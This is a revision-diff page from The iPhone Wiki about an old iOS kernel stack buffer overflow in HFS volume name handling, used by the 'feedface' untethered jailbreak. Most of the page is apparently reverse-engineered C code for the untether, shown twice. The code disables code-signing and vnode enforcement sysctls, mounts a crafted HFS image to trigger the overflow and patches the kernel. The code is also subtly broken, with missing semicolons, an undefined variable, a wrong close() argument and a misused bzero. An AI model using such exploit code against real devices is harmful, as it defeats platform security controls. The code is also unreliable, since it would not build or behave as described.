Difference between revisions of "HFS Legacy Volume Name Stack Buffer Overflow"

From The iPhone Wiki
Jump to: navigation, search
(Sources for information: technical info of HFS name exploit)
(Better formatting. If anyone could please seperate vm_prep and main, that would be awesome.)
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
 
The '''HFS Legacy Volume Name Stack Buffer Overflow''' is a [[kernel]] vulnerability used to achieve an [[untethered jailbreak]]. Its exploit implementation, dubbed "feedface,"[https://twitter.com/pod2g/status/33997326070583296] was used in conjunction with limera1n's [[bootrom]] exploit or the [[usb_control_msg(0xA1, 1) Exploit]] in [[greenpois0n (jailbreak)|greenpois0n]].
 
The '''HFS Legacy Volume Name Stack Buffer Overflow''' is a [[kernel]] vulnerability used to achieve an [[untethered jailbreak]]. Its exploit implementation, dubbed "feedface,"[https://twitter.com/pod2g/status/33997326070583296] was used in conjunction with limera1n's [[bootrom]] exploit or the [[usb_control_msg(0xA1, 1) Exploit]] in [[greenpois0n (jailbreak)|greenpois0n]].
  +
  +
== Exploiting the Kernel Bug ==
  +
  +
This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb
  +
to take control of PC register and do basically whatever you want, in that case, they used a function called
  +
real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what
  +
the untether looked like.
  +
  +
int mnt_our_hfs()
  +
{
  +
struct hfs_mount_args i;
  +
bzero(i, sizeof(i));
  +
i.fspec = (int)"/dev/vn0";
  +
i.hfs_uid = args.hfs_gid = 99;
  +
i.hfs_mask = 0x1C5;
  +
puts("[+]Triggering the kernel exploit");
  +
mount("hfs", "mnt/", MNT_RDONLY, i);
  +
return puts("[+] Payload was successful");
  +
}
  +
  +
int prep_vn()
  +
{
  +
vn_ioctl vn;
  +
int i = open("/dev/vn0", O_RDONLY, 0);
  +
if(i < 0){
  +
puts("[-]Can't open /dev/vn0");
  +
exit(1);
  +
}
  +
ioctl(i, VNIOCDETACH, &vn);
  +
vn.vn_file = (int)"/usr/lib/hfs_mdb";
  +
vn.vn_control = vncontrol_readwrite_io_e;
  +
if(ioctl(i, VNIOCATTACH, &vn) < 0)
  +
{
  +
puts("[-]Coudn't attach to /dev/vn0")''
  +
close(i);
  +
exit(1);
  +
}
  +
return close(1);
  +
}
  +
  +
int main(int argc, char const *argv[])
  +
{
  +
int result;
  +
struct stat i;
  +
uint32_t zero = 0, one = 1;
  +
sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
  +
sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
  +
prep_vn();
  +
i.st_uid = 0;
  +
i.st_gid = 0;
  +
i.st_rdev = 0;
  +
i.st_atimespec.tv_nsec = 0;
  +
i.st_atimespec.tv_sec = 0;
  +
i.st_mtimespec.tv_nsec = 0;
  +
i.st_mtimespec.tv_sec = 0;
  +
i.st_ctimespec.tv_sec = 0;
  +
i.st_dev = (dev_t)"/dev/vn0";
  +
i.st_ino = 99;
  +
i.st_uid = 453;
  +
puts("[+]Trigger kernel exploit");
  +
mnt_our_hfs();
  +
sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
  +
patch_kernel();
  +
return 0;
  +
}
   
 
== Credit ==
 
== Credit ==
Line 6: Line 71:
 
== Sources for information ==
 
== Sources for information ==
 
*[http://www.twitlonger.com/show/8jep67 TwitLonger]
 
*[http://www.twitlonger.com/show/8jep67 TwitLonger]
*http://pastie.org/2060071 (from a [http://twitter.com/#!/0naj/status/80211549427482624 Tweet] by [[User:jan0|@0naj]])
+
*http://pastie.org/2060071 (from a [https://twitter.com/0naj/status/80211549427482624 tweet] by [[User:jan0|jan0]])
  +
*[http://www.slideshare.net/i0n1c/blackhat-usa-2011-stefan-esser-ios-kernel-exploitation BlackHat Presentation by [[I0n1c]]] (starting at slide 24)
   
 
[[Category:Exploits]]
 
[[Category:Exploits]]

Latest revision as of 14:21, 28 March 2015

The HFS Legacy Volume Name Stack Buffer Overflow is a kernel vulnerability used to achieve an untethered jailbreak. Its exploit implementation, dubbed "feedface,"[1] was used in conjunction with limera1n's bootrom exploit or the usb_control_msg(0xA1, 1) Exploit in greenpois0n.

Exploiting the Kernel Bug

This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb to take control of PC register and do basically whatever you want, in that case, they used a function called real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what the untether looked like.

 int mnt_our_hfs()
 {
  struct hfs_mount_args i;
  bzero(i, sizeof(i));
  i.fspec = (int)"/dev/vn0";
  i.hfs_uid = args.hfs_gid = 99;
  i.hfs_mask = 0x1C5;
  puts("[+]Triggering the kernel exploit");
  mount("hfs", "mnt/", MNT_RDONLY, i);
  return puts("[+] Payload was successful");
 }
 int prep_vn()
 {
  vn_ioctl vn;
  int i = open("/dev/vn0", O_RDONLY, 0);
  if(i < 0){
     puts("[-]Can't open /dev/vn0");
     exit(1);
  }
  ioctl(i, VNIOCDETACH, &vn);
  vn.vn_file = (int)"/usr/lib/hfs_mdb";
  vn.vn_control = vncontrol_readwrite_io_e;
  if(ioctl(i, VNIOCATTACH, &vn) < 0)
  {
     puts("[-]Coudn't attach to /dev/vn0")
     close(i);
     exit(1);
  }
  return close(1);
 }
 
 int main(int argc, char const *argv[])
 {
  int result;
  struct stat i;
  uint32_t zero = 0, one = 1;
  sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
  sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
  prep_vn();
  i.st_uid = 0;
  i.st_gid = 0;
  i.st_rdev = 0;
  i.st_atimespec.tv_nsec = 0;
  i.st_atimespec.tv_sec = 0;
  i.st_mtimespec.tv_nsec = 0;
  i.st_mtimespec.tv_sec = 0;
  i.st_ctimespec.tv_sec = 0;
  i.st_dev = (dev_t)"/dev/vn0";
  i.st_ino = 99;
  i.st_uid = 453;
  puts("[+]Trigger kernel exploit");
  mnt_our_hfs();
  sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
  patch_kernel();
  return 0;
  }

Credit

jan0, pod2g, Posixninja

Sources for information